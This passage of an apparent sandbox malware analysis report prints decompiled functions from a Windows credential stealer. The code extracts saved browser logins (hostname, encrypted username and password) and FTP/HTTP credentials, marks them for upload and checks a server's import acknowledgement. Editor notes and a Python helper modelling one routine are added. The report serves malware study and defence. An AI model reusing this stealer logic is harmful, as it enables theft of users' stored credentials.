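        print(f"{store}: cluster at offset 0x{off:x}")
    stop = walk_packed_string_list(SAMPLE_DUMP, SAMPLE_DUMP.find(b"CONSTRAINT"))
    print("stop list:", stop)
```

Run it against a dumped region (for example the 0x10000000 image the report names as its memory dump source) by reading the file into `buf`; widen `window` when the module stores its strings far apart, and pass the offset of "CONSTRAINT" to `walk_packed_string_list` to recover the full stop list the parser skips.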

C-Code - Quality: 75%
	/* Returns 1 when the current process is a 32-bit process running under
	   WOW64 on 64-bit Windows, else 0. Both exports are resolved by name
	   through GetProcAddress so the module still loads on kernel32 builds
	   that lack them; a missing export or a FALSE IsWow64Process result
	   yields 0. */
	E10002E8D() {
		char _v8;
		struct HINSTANCE__* _t4;
		intOrPtr* _t10;
		struct HINSTANCE__* _t15;

		_t4 = GetModuleHandleA("kernel32.dll");
		_t15 = _t4;
		_v8 = 0;                                       /* receives the IsWow64Process BOOL */
		if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
			L5:
			return 0;
		} else {
			_t10 = GetProcAddress(_t15, "IsWow64Process");
			if(_t10 == 0) {
				goto L5;
			} else {
				 *_t10(GetCurrentProcess(),  &_v8);     /* IsWow64Process(hProcess, &Wow64Process) */
				if(_v8 == 0) {
					goto L5;                           /* native 32-bit Windows: not WOW64 */
				} else {
					return 1;
				}
			}
		}
	}







Instruction addresses for E10002E8D, one per decompiled line above (0x00000000 marks a line with no mapped instruction): 0x10002e9b to 0x10002ef4.

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10002E9B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 10002EB3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 10002EC4
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 10002ED3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                                                                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 977827838-3073145729
                                                                                                                                        • Opcode ID: 5b79a237afadd835cf86545bfc6af71ce36a6e0d85d35b22b1c2c1cc815c26e2
                                                                                                                                        • Instruction ID: e5e534cd325a3e9d84e4aad81ea4bb789e1f2123527bc56bb0060dd97492ce48
                                                                                                                                        • Opcode Fuzzy Hash: 5b79a237afadd835cf86545bfc6af71ce36a6e0d85d35b22b1c2c1cc815c26e2
                                                                                                                                        • Instruction Fuzzy Hash: 7AF0896760090466FB50D6B8DCC5BEE72DCD7411E9F160439F205E2186EA65DD059261
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E100070CA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                        				char* _v12;
                                                                                                                                        				char _v20;
                                                                                                                                        				CHAR* _v24;
                                                                                                                                        				CHAR* _v28;
                                                                                                                                        				intOrPtr _v32;
                                                                                                                                        				intOrPtr _v36;
                                                                                                                                        				intOrPtr _v40;
                                                                                                                                        				void* _t38;
                                                                                                                                        				intOrPtr _t40;
                                                                                                                                        				intOrPtr _t43;
                                                                                                                                        				char* _t50;
                                                                                                                                        				char* _t59;
                                                                                                                                        				char* _t61;
                                                                                                                                        				void* _t70;
                                                                                                                                        				char* _t75;
                                                                                                                                        				char* _t77;
                                                                                                                                        				char* _t79;
                                                                                                                                        
                                                                                                                                        				_t70 = __ecx;
                                                                                                                                        				_t38 = E10001EEF(_a8);
                                                                                                                                        				if(_t38 != 0) {
                                                                                                                                        					_t40 = E10004137(_a8);
                                                                                                                                        					__eflags = _t40;
                                                                                                                                        					if(_t40 == 0) {
                                                                                                                                        						E10006B0B(_a12, _a16);
                                                                                                                                        						_t43 = E10001FB7(__eflags, _a8,  &_v20);
                                                                                                                                        						__eflags = _t43;
                                                                                                                                        						if(_t43 != 0) {
                                                                                                                                        							_v24 = E10001888(0x200);
                                                                                                                                        							_v28 = E10001888(0x200);
                                                                                                                                        							_v32 = E10001888(0x200);
                                                                                                                                        							_t50 = StrStrIA(_v12, "hostname\":\"");
                                                                                                                                        							__eflags = _t50;
                                                                                                                                        							if(_t50 != 0) {
                                                                                                                                        								_t75 = _t50 + 0xb;
                                                                                                                                        								while(1) {
                                                                                                                                        									__eflags =  *_t75 - 0x22;
                                                                                                                                        									if( *_t75 == 0x22) {
                                                                                                                                        										break;
                                                                                                                                        									}
                                                                                                                                        									asm("movsb");
                                                                                                                                        								}
                                                                                                                                        								_t59 = StrStrIA(_v12, "encryptedPassword\":\"");
                                                                                                                                        								__eflags = _t59;
                                                                                                                                        								if(_t59 != 0) {
                                                                                                                                        									_t77 = _t59 + 0x14;
                                                                                                                                        									while(1) {
                                                                                                                                        										__eflags =  *_t77 - 0x22;
                                                                                                                                        										if( *_t77 == 0x22) {
                                                                                                                                        											break;
                                                                                                                                        										}
                                                                                                                                        										asm("movsb");
                                                                                                                                        									}
                                                                                                                                        									_t61 = StrStrIA(_v12, "encryptedUsername\":\"");
                                                                                                                                        									__eflags = _t61;
                                                                                                                                        									if(_t61 != 0) {
                                                                                                                                        										_t79 = _t61 + 0x14;
                                                                                                                                        										while(1) {
                                                                                                                                        											__eflags =  *_t79 - 0x22;
                                                                                                                                        											if( *_t79 == 0x22) {
                                                                                                                                        												break;
                                                                                                                                        											}
                                                                                                                                        											asm("movsb");
                                                                                                                                        										}
                                                                                                                                        										_v36 = E10006BEC(_t70, _v24, lstrlenA(_v24));
                                                                                                                                        										_v40 = E10006BEC(_t70, _v28, lstrlenA(_v28));
                                                                                                                                        										__eflags = _v32;
                                                                                                                                        										if(_v32 != 0) {
                                                                                                                                        											__eflags = _v40;
                                                                                                                                        											if(_v40 != 0) {
                                                                                                                                        												E10001522(_a4, 0xbeef0000);
                                                                                                                                        												E10001584(_a4, _v32);
                                                                                                                                        												E10001584(_a4, _v36);
                                                                                                                                        												E10001584(_a4, _v40);
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							E10001871(_v32);
                                                                                                                                        							E10001871(_v24);
                                                                                                                                        							E10001871(_v28);
                                                                                                                                        							E10001871(_v36);
                                                                                                                                        							E10001871(_v40);
                                                                                                                                        							E1000204C( &_v20);
                                                                                                                                        						}
                                                                                                                                        						return E10006BC3();
                                                                                                                                        					} else {
                                                                                                                                        						return _t40;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					return _t38;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: encryptedPassword":"$encryptedUsername":"$hostname":"
                                                                                                                                        • API String ID: 0-653306420
                                                                                                                                        • Opcode ID: 599aa5b4b63fc17a903d442d354a0c4829d1819cf81b9a9489ec28215852942a
                                                                                                                                        • Instruction ID: 4329ed4530f3b2e0f2b5c2f7938b4f80b03f70469c0e1cf8edac79dde31dbab1
                                                                                                                                        • Opcode Fuzzy Hash: 599aa5b4b63fc17a903d442d354a0c4829d1819cf81b9a9489ec28215852942a
                                                                                                                                        • Instruction Fuzzy Hash: 4A414479D0010AAAFF11DFA0CC069EE7AB1FF053D0F154020F915751AADB3AAE51D760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001FB7(void* __eflags, CHAR* _a4, void** _a8) {
                                                                                                                                        				void* _t11;
                                                                                                                                        				void* _t12;
                                                                                                                                        				void* _t18;
                                                                                                                                        				void* _t20;
                                                                                                                                        				void** _t24;
                                                                                                                                        
                                                                                                                                        				_t24 = _a8;
                                                                                                                                        				E1000189F(_t24, 0x10);
                                                                                                                                        				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
                                                                                                                                        				 *_t24 = _t11;
                                                                                                                                        				_t12 = _t11 + 1;
                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                        					_t24[3] = GetFileSize(_t12 - 1, 0);
                                                                                                                                        					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
                                                                                                                                        					if(_t18 == 0) {
                                                                                                                                        						CloseHandle( *_t24);
                                                                                                                                        						 *_t24 = 0xffffffff;
                                                                                                                                        					} else {
                                                                                                                                        						_t24[1] = _t18;
                                                                                                                                        						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
                                                                                                                                        						_t24[2] = _t20;
                                                                                                                                        						if(_t20 == 0) {
                                                                                                                                        							CloseHandle(_t24[1]);
                                                                                                                                        							CloseHandle( *_t24);
                                                                                                                                        							 *_t24 = 0xffffffff;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return 0 | _t24[2] != 0x00000000;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001FD8
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001FE6
                                                                                                                                        • CreateFileMappingA.KERNEL32 ref: 10001FFA
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 1000200F
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 1000201E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 10002025
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10002034
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3733816638-0
                                                                                                                                        • Opcode ID: a5e042e96ddfa17d9944cf055e53800ed9224505dcef65ff44debee41d5298b0
                                                                                                                                        • Instruction ID: 908f2fd6124b7aeb9f61400a225c527c45ebf35c0f2496cc7b6ec2ac2c5cf9e9
                                                                                                                                        • Opcode Fuzzy Hash: a5e042e96ddfa17d9944cf055e53800ed9224505dcef65ff44debee41d5298b0
                                                                                                                                        • Instruction Fuzzy Hash: 07110875680711BAFB319F74CC83F143A98EB01B90F248561B764BE0EFD6B5AA109A19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.16%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100064B3(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char* _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				char* _v20;
                                                                                                                                        				char* _v24;
                                                                                                                                        				char* _v28;
                                                                                                                                        				intOrPtr _v32;
                                                                                                                                        				void* _t80;
                                                                                                                                        				char* _t87;
                                                                                                                                        				void* _t101;
                                                                                                                                        				char* _t112;
                                                                                                                                        				char* _t139;
                                                                                                                                        				char* _t140;
                                                                                                                                        
                                                                                                                                        				_t138 = __edx;
                                                                                                                                        				_t137 = __ecx;
                                                                                                                                        				_v16 = E10001091(_t80, __ebx, __edx, _a4);
                                                                                                                                        				if(_v16 >= 0x10) {
                                                                                                                                        					E100012E8(_t81, __edx, _a4);
                                                                                                                                        					_v12 = 1;
                                                                                                                                        					_v8 = E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        					__eflags = _v12;
                                                                                                                                        					if(_v12 == 0) {
                                                                                                                                        						L5:
                                                                                                                                        						return 1;
                                                                                                                                        					} else {
                                                                                                                                        						__eflags = _v8 - 2;
                                                                                                                                        						if(_v8 < 2) {
                                                                                                                                        							goto L5;
                                                                                                                                        						} else {
                                                                                                                                        							__eflags = _v8 - 6;
                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                        								_t87 = E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        								__eflags = _v12;
                                                                                                                                        								if(_v12 == 0) {
                                                                                                                                        									L8:
                                                                                                                                        									return 1;
                                                                                                                                        								} else {
                                                                                                                                        									__eflags = _t87;
                                                                                                                                        									if(_t87 == 0) {
                                                                                                                                        										__eflags = _v8 - 5;
                                                                                                                                        										if(__eflags < 0) {
                                                                                                                                        											_v32 = E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        											E10001424( &_v12, __ecx, _a4, 4,  &_v12);
                                                                                                                                        										} else {
                                                                                                                                        											E10001424( &_v12, __ecx, _a4, 0x18,  &_v12);
                                                                                                                                        											_v32 = E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        										}
                                                                                                                                        										E10006050(_t137, _a4,  &_v12);
                                                                                                                                        										__eflags = _v32 - 1;
                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                        											E10006343(_t137, _t138, __eflags, _a4, _a8, _v8,  &_v12);
                                                                                                                                        											E10006050(_t137, _a4,  &_v12);
                                                                                                                                        										}
                                                                                                                                        										__eflags = _v12;
                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                        											E10006343(_t137, _t138, __eflags, _a4, _a8, _v8,  &_v12);
                                                                                                                                        											__eflags = _v12;
                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                        												_t139 = E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        												while(1) {
                                                                                                                                        													__eflags = _v12;
                                                                                                                                        													if(_v12 == 0) {
                                                                                                                                        														break;
                                                                                                                                        													}
                                                                                                                                        													_t140 = _t139;
                                                                                                                                        													__eflags = _t140;
                                                                                                                                        													if(_t140 != 0) {
                                                                                                                                        														_t101 = E100014DB(_a4);
                                                                                                                                        														__eflags = _t101 - _v16;
                                                                                                                                        														if(_t101 != _v16) {
                                                                                                                                        															__eflags = _v8 - 6;
                                                                                                                                        															if(__eflags >= 0) {
                                                                                                                                        																E100013A0(__eflags, _a4,  &_v12);
                                                                                                                                        																E10006050(_t137, _a4,  &_v12);
                                                                                                                                        																E10006050(_t137, _a4,  &_v12);
                                                                                                                                        															}
                                                                                                                                        															_v20 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
                                                                                                                                        															_v24 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
                                                                                                                                        															_v28 = E10006201(_t137, _t138, __eflags, _a4,  &_v12);
                                                                                                                                        															__eflags = _v20;
                                                                                                                                        															if(_v20 != 0) {
                                                                                                                                        																__eflags = _v24;
                                                                                                                                        																if(_v24 != 0) {
                                                                                                                                        																	__eflags = _v28;
                                                                                                                                        																	if(_v28 != 0) {
                                                                                                                                        																		__eflags = _v12;
                                                                                                                                        																		if(_v12 != 0) {
                                                                                                                                        																			_t112 = StrStrIA(_v20, "ftp://");
                                                                                                                                        																			__eflags = _t112;
                                                                                                                                        																			if(_t112 == 0) {
                                                                                                                                        																				_t112 = StrStrIA(_v20, "http://");
                                                                                                                                        																				__eflags = _t112;
                                                                                                                                        																				if(_t112 == 0) {
                                                                                                                                        																					_t112 = StrStrIA(_v20, "https://");
                                                                                                                                        																				}
                                                                                                                                        																			}
                                                                                                                                        																			__eflags = _t112;
                                                                                                                                        																			if(_t112 != 0) {
                                                                                                                                        																				E10001522(_a8, 0xbeef0000);
                                                                                                                                        																				E10001584(_a8, _v20);
                                                                                                                                        																				E10001584(_a8, _v24);
                                                                                                                                        																				E10001584(_a8, _v28);
                                                                                                                                        																			}
                                                                                                                                        																		}
                                                                                                                                        																	}
                                                                                                                                        																}
                                                                                                                                        															}
                                                                                                                                        															E10001871(_v20);
                                                                                                                                        															E10001871(_v24);
                                                                                                                                        															E10001871(_v28);
                                                                                                                                        															_t139 = _t140 - 1;
                                                                                                                                        															__eflags = _t139;
                                                                                                                                        															continue;
                                                                                                                                        														} else {
                                                                                                                                        														}
                                                                                                                                        													}
                                                                                                                                        													break;
                                                                                                                                        												}
                                                                                                                                        												return _v12;
                                                                                                                                        											} else {
                                                                                                                                        												return 0;
                                                                                                                                        											}
                                                                                                                                        										} else {
                                                                                                                                        											return 0;
                                                                                                                                        										}
                                                                                                                                        									} else {
                                                                                                                                        										goto L8;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								goto L5;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					return 1;
                                                                                                                                        				}
                                                                                                                                        			}

















                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ftp://$http://$https://
                                                                                                                                        • API String ID: 0-2804853444
                                                                                                                                        • Opcode ID: 912e31a90e7cd3ee126c7e246cb41169b457d85b349e360c934a324f1a7ac887
                                                                                                                                        • Instruction ID: 49d703680382d062719a75d7b5560dcea067daca85c923e5b649dc2b0f3700be
                                                                                                                                        • Opcode Fuzzy Hash: 912e31a90e7cd3ee126c7e246cb41169b457d85b349e360c934a324f1a7ac887
                                                                                                                                        • Instruction Fuzzy Hash: C061047980050DFAEF11DF90CC41AEEBBBAEF083C5F608061F915A5069D732AB95DB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E100019E0(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				intOrPtr _v20;
                                                                                                                                        				char _v280;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __ebp;
                                                                                                                                        				void* _t26;
                                                                                                                                        				signed int _t40;
                                                                                                                                        				signed int _t42;
                                                                                                                                        				void* _t44;
                                                                                                                                        
                                                                                                                                        				_t45 = __edx;
                                                                                                                                        				_t44 = __ecx;
                                                                                                                                        				_t42 = 0;
                                                                                                                                        				_t26 =  &_v8;
                                                                                                                                        				_push(_t26);
                                                                                                                                        				_push(_a4);
                                                                                                                                        				L1000BA64();
                                                                                                                                        				if(_t26 >= 0) {
                                                                                                                                        					_v16 = E10001091(_t26, 0, __edx, _a4);
                                                                                                                                        					_t26 = GlobalLock(_v8);
                                                                                                                                        					_t47 = _t26;
                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                        						_v20 = _t26;
                                                                                                                                        						_v12 = E10001888(_v16);
                                                                                                                                        						E100018BF(_v20, _v12, _v16);
                                                                                                                                        						GlobalUnlock(_v8);
                                                                                                                                        						E100018F8(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
                                                                                                                                        						E10001356(E10001963( &_v280, _v12, _v16), _t45, _a4);
                                                                                                                                        						_t40 = E10001537(_a4, "CRYPTED0YUI1.0", 8);
                                                                                                                                        						_t42 = _t40 & E10001537(_a4, _v12, _v16);
                                                                                                                                        						_t26 = E10001871(_v12);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				E100012C2(_t26, _t45, _a4);
                                                                                                                                        				return _t42;
                                                                                                                                        			}














Instruction address column for this function (mnemonics not captured in this export): 0x100019e0 to 0x10001aa2

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 100019F3
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10001A0E
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 10001A36
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10001A3E
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                                                                                                        • String ID: CRYPTED0YUI1.0
                                                                                                                                        • API String ID: 4083238039-1217275205
                                                                                                                                        • Opcode ID: 567ace60eeaf6ab1a08dbb00e70395c75842e193db012652eee0cbfb56d9a6ca
                                                                                                                                        • Instruction ID: 667f95190686395c3df76180ac135867673b48139b4ad190086e5bc80b463836
                                                                                                                                        • Opcode Fuzzy Hash: 567ace60eeaf6ab1a08dbb00e70395c75842e193db012652eee0cbfb56d9a6ca
                                                                                                                                        • Instruction Fuzzy Hash: AB117779D0050DBFEF029FA0DC428EDBF76EF053C0F108561BA14A506ADB72AB65AB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.14%

                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                        			E1000B0DD(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                                                                                        				void* _v3;
                                                                                                                                        				void* _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				char* _v16;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				signed int _t15;
                                                                                                                                        				int _t25;
                                                                                                                                        				void* _t29;
                                                                                                                                        				signed int _t33;
                                                                                                                                        
                                                                                                                                        				_t33 = __edx ^ __eax;
                                                                                                                                        				_t15 = __eax ^ _t33;
                                                                                                                                        				_t34 = _t33 ^ _t15;
                                                                                                                                        				_push(0x1000b0f7);
                                                                                                                                        				asm("clc");
                                                                                                                                        				if((_t33 ^ _t15) < 0) {
                                                                                                                                        					asm("hlt");
                                                                                                                                        					 *_t15 =  *_t15 + _t15;
                                                                                                                                        					 *_t15 =  *_t15 + _t15;
                                                                                                                                        					_t29 = 0;
                                                                                                                                        					_t16 =  &_v8;
                                                                                                                                        					_push(_t16);
                                                                                                                                        					_push(_a4);
                                                                                                                                        					L1000BA64();
                                                                                                                                        					if(_t16 >= 0) {
                                                                                                                                        						_v12 = E10001091(_t16, 0, _t34, _a4);
                                                                                                                                        						_v16 = E10001888(_t22 + 1);
                                                                                                                                        						_t25 = GlobalLock(_v8);
                                                                                                                                        						_t16 = _t25;
                                                                                                                                        						if(_t25 != 0) {
                                                                                                                                        							E100018BF(_t16, _v16, _v12);
                                                                                                                                        							_t16 = GlobalUnlock(_v8);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					E100012C2(_t16, _t34, _a4);
                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                        						if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
                                                                                                                                        							_t29 = 1;
                                                                                                                                        						}
                                                                                                                                        						E10001871(_v16);
                                                                                                                                        					}
                                                                                                                                        					return _t29;
                                                                                                                                        				} else {
                                                                                                                                        					return _t15;
                                                                                                                                        				}
                                                                                                                                        			}


Instruction address column for this function (mnemonics not captured in this export): 0x1000b0e4 to 0x1000b175

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,1000B0F7), ref: 1000B107
                                                                                                                                        • GlobalLock.KERNEL32 ref: 1000B128
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,?,?,?,00000001,?,?,?,1000B0F7), ref: 1000B140
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,1000B0F7), ref: 1000B15B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLockStreamUnlock
                                                                                                                                        • String ID: STATUS-IMPORT-OK
                                                                                                                                        • API String ID: 2287449323-1591331578
                                                                                                                                        • Opcode ID: 55db0062bef06cf4ed714bf1f1a21096e2e47512b03e507c76ad138cf5971688
                                                                                                                                        • Instruction ID: 09f84e8c5236a89e3fb2385dfb927d7899cf37e895495d05523066b617484809
                                                                                                                                        • Opcode Fuzzy Hash: 55db0062bef06cf4ed714bf1f1a21096e2e47512b03e507c76ad138cf5971688
                                                                                                                                        • Instruction Fuzzy Hash: A6012D79E04608BBFF02DFB1CC869ED7BB6EF012C4F158171B920A506ADB359E519B10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.13%

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E100023E6(void* __eflags, CHAR* _a4) {
                                                                                                                                        				int _t6;
                                                                                                                                        				char* _t8;
                                                                                                                                        				char* _t10;
                                                                                                                                        				CHAR* _t16;
                                                                                                                                        
                                                                                                                                        				_t16 = E10001DB1(_a4, 0);
                                                                                                                                        				_t6 = lstrlenA(_a4);
                                                                                                                                        				if(_t6 > 1) {
                                                                                                                                        					_push(_t16);
                                                                                                                                        					if( *_t16 == 0x22) {
                                                                                                                                        						asm("cld");
                                                                                                                                        						_t3 =  &(_t16[1]); // 0x1
                                                                                                                                        						memcpy(_t16, _t3, _t6);
                                                                                                                                        					}
                                                                                                                                        					_pop(_t16);
                                                                                                                                        				}
                                                                                                                                        				_t8 = StrStrIA(_t16, ".exe");
                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                        					 *((char*)(_t8 + 4)) = 0;
                                                                                                                                        				}
                                                                                                                                        				_t10 = StrRChrIA(_t16, 0, 0x5c);
                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                        					 *_t16 = 0;
                                                                                                                                        				} else {
                                                                                                                                        					 *_t10 = 0;
                                                                                                                                        				}
                                                                                                                                        				if(lstrlenA(_t16) <= 3) {
                                                                                                                                        					 *_t16 = 0;
                                                                                                                                        				}
                                                                                                                                        				return _t16;
                                                                                                                                        			}
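Added example (editor's note, not part of the Joe Sandbox report or the sample's own code): a Python model of the decompiled routine E100023E6 above, written so that its behaviour can be exercised on constructed inputs. The routine takes a string such as a quoted command line or an application path, drops a leading double quote, cuts everything after the first case-insensitive ".exe", strips the file name after the last backslash, and returns an empty string when fewer than four characters remain. E10001DB1 is assumed to be a string-duplication helper (its API list shows lstrlen/lstrcpy/lstrcat); that is an assumption, not something the report states.

```python
def exe_directory(value: str) -> str:
    """Model of E100023E6 (added example, not the sample's code).

    Reduces a value such as '"C:\\Program Files\\App\\app.exe" /arg'
    to the directory 'C:\\Program Files\\App'. Returns '' when no
    usable directory results, mirroring the '*_t16 = 0' paths.
    """
    # E10001DB1(_a4, 0): assumed to return a private copy of the input.
    buf = value

    # lstrlenA(_a4) > 1 and *buf == '"':
    # memcpy(buf, buf + 1, len) shifts the string left by one, dropping the quote.
    if len(value) > 1 and buf.startswith('"'):
        buf = buf[1:]

    # StrStrIA(buf, ".exe") is case-insensitive and returns the FIRST match;
    # *(p + 4) = 0 truncates right after it.
    pos = buf.lower().find(".exe")
    if pos != -1:
        buf = buf[:pos + 4]

    # StrRChrIA(buf, 0, '\\'): cut at the last backslash; no backslash -> ''.
    slash = buf.rfind("\\")
    buf = buf[:slash] if slash != -1 else ""

    # lstrlenA(buf) <= 3 -> '' (rejects results such as a bare 'C:').
    if len(buf) <= 3:
        buf = ""
    return buf


# Constructed inputs for illustration only (not values observed in the sample).
CONSTRUCTED_INPUTS = [
    '"C:\\Program Files\\App\\app.exe" /arg',  # quoted command line -> directory
    "C:\\Tools\\app.EXE",                    # upper-case extension still matches
    "app.exe",                               # no backslash -> ''
    "C:\\a.exe",                             # leaves 'C:' (2 chars) -> ''
    "C:\\my.exe.files\\app.exe",             # first '.exe' wins -> 'C:' -> ''
]

if __name__ == "__main__":
    for item in CONSTRUCTED_INPUTS:
        print(repr(item), "->", repr(exe_directory(item)))
```

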